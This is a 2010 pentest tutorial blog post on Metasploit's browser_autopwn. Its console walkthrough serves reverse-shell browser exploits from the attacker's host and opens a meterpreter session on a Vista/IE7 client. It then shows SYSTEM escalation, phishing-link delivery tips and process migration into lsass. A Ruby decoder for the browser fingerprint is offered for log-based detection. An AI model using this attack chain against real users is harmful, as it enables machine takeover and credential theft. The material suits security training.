Archive for June, 2010

browser exploitation with metasploit

After talking with a few people who have done the SANS SEC560 (GPEN) course, and having sat the exam myself, one thing I felt was missing from the metasploit coverage was its browser exploitation features. With pentesting and exploitation in general having focused on client-side attacks for a while now, the course could probably benefit from something like this. First you'll need to start metasploit and load the server/browser_autopwn module:

       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 209 payloads - 23 encoders - 8 nops
       =[ svn r9403 updated 3 days ago (2010.06.03)

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

From here, the only option that must be set to get basic functionality is LHOST, the address the reverse-connect payloads will call back to; it has to be reachable from the victim's network, not just from the attacking host. Unless you want to hand out the long random URIPATH, you will probably want to set that as well (a fixed, short path is easier to deliver, but also easier for anyone else to stumble on). Once those options are set, run the exploit:

msf auxiliary(browser_autopwn) > set URIPATH testing
URIPATH => testing
msf auxiliary(browser_autopwn) > set LHOST 192.168.0.22
LHOST => 192.168.0.22
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.0.22...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/90Yiozy7u9n
[*]  Local IP: http://192.168.0.22:8080/90Yiozy7u9n
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/xGIjmqty
[*]  Local IP: http://192.168.0.22:8080/xGIjmqty
[*] Server started.

<- cut ->

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.22:3333
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.22:6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:8080/testing
[*]  Local IP: http://192.168.0.22:8080/testing
[*] Server started.

Now, on the client, browse to the URL listed above as the 'Local IP', in this case http://192.168.0.22:8080/testing. Back in the metasploit console window you will see:

[*] Request '/testing' from 192.168.0.5:64865
[*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865
[*] JavaScript Report: Windows:Vista:undefined:en-us:x86:MSIE:7.0:
[*] Responding with exploits
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.0.5:64866...
[*] Sending stage (748032 bytes) to 192.168.0.5
[*] Meterpreter session 1 opened (192.168.0.22:3333 -> 192.168.0.5:64867) at Sun Jun 06 12:25:01 +1000 2010
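The second request above is the interesting one: the sessid parameter is the JavaScript fingerprint of the browser (OS, flavour, language, architecture, browser and version), URL-escaped and base64-encoded, and it is what browser_autopwn uses to decide which exploits to send. The decoder below is an added example written for this post, not code from Metasploit; it pulls the sessid out of console request lines like the ones shown and splits it into fields. The field names (os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_ver) are an assumption inferred from the order of the values in the report line, and the sample lines are constructed, not captured. The same decoding is useful on the defensive side: a web proxy log full of base64 sessid parameters that decode to this colon-separated shape is a good indicator that someone is running browser_autopwn against your users.

```ruby
require 'base64'
require 'cgi'

# Order of the colon-separated fields in the browser_autopwn JavaScript report,
# inferred from the line shown above ("Windows:Vista:undefined:en-us:x86:MSIE:7.0:").
# The field names are an assumption made for this example, not Metasploit's own.
FIELDS = %i[os_name os_flavor os_sp os_lang arch ua_name ua_ver].freeze

# Constructed msfconsole output, modelled on the request lines shown above.
# The third line carries a sessid that is valid base64 but not a fingerprint.
SAMPLE_LINES = [
  "[*] Request '/testing' from 192.168.0.5:64865",
  "[*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865",
  "[*] Request '/testing?sessid=bm90LWEtZmluZ2VycHJpbnQ%3d' from 192.168.0.9:50123",
].freeze

# Decode a URL-escaped, base64 sessid into a hash of fingerprint fields.
# Returns nil when the value is not base64 or does not have the expected shape,
# so a stray parameter that merely happens to be called sessid is not reported.
# "undefined" (the JavaScript value for an unknown field) becomes nil.
def decode_sessid(value)
  raw = begin
    Base64.strict_decode64(CGI.unescape(value))
  rescue ArgumentError
    return nil
  end
  return nil unless raw.end_with?(':')
  parts = raw.chomp(':').split(':', -1)
  return nil unless parts.size == FIELDS.size
  FIELDS.zip(parts.map { |p| p == 'undefined' ? nil : p }).to_h
end

# Parse one "[*] Request '...' from ip:port" console line. Returns nil for lines
# that are not request lines, otherwise a hash with the client, the path and the
# decoded fingerprint (nil when the request carried no usable sessid).
def parse_request_line(line)
  m = line.match(/\A\[\*\] Request '([^']*)' from (\d{1,3}(?:\.\d{1,3}){3}):(\d+)/)
  return nil unless m
  path, query = m[1].split('?', 2)
  sessid = query && query[/(?:\A|&)sessid=([^&]*)/, 1]
  {
    client: m[2],
    port: m[3].to_i,
    path: path,
    fingerprint: sessid ? decode_sessid(sessid) : nil,
  }
end

# Keep only the requests that carried a decodable fingerprint: these are the
# second-stage requests the injected JavaScript makes after profiling the browser.
def fingerprint_requests(lines)
  lines.map { |l| parse_request_line(l) }.compact.select { |r| r[:fingerprint] }
end

if $PROGRAM_NAME == __FILE__
  fingerprint_requests(SAMPLE_LINES).each do |r|
    fp = r[:fingerprint]
    puts "#{r[:client]} -> #{fp[:ua_name]} #{fp[:ua_ver]} on #{fp[:os_name]} " \
         "#{fp[:os_flavor]} (#{fp[:arch]}, #{fp[:os_lang]}, sp=#{fp[:os_sp].inspect})"
  end
end
```

Run against the constructed lines it reports a single hit, the Vista/IE7 client at 192.168.0.5, and ignores both the bare first request and the decoy sessid. Feeding it real proxy or IIS logs only requires adapting the regular expression in parse_request_line to that log format; decode_sessid is independent of where the parameter came from.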

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type         Information                   Connection
  --  ----         -----------                   ----------
  1   meterpreter  vistavm\testadmin @ VISTAVM  192.168.0.22:3333 -> 192.168.0.5:64867

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > use priv
Loading extension priv...success.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > idletime
User has been idle for: 2 mins 46 secs
meterpreter >

Now, how would you get clients (victims) to visit this in a pentest? An organisation-wide email carrying the link is usually the easiest way. Note that SRVPORT defaults to 8080; if you start msfconsole as root you can set SRVPORT to 80 (provided nothing else is listening on that port), which looks far less suspicious in a link than a non-standard port. Running the whole console as root is a lot of privilege for one listener, though; a firewall rule that redirects port 80 to 8080 on the attacking host gives the same result with msfconsole left unprivileged.

You will also want to migrate to a more stable process within meterpreter in case the user closes their browser, since until you do the session lives inside the exploited browser process. Run 'ps' in meterpreter to list running processes, pick a long-lived one (for example winlogon or lsass, which you can only migrate into with the SYSTEM privileges obtained via getsystem above) and run 'migrate <pid>' so your session stays connected.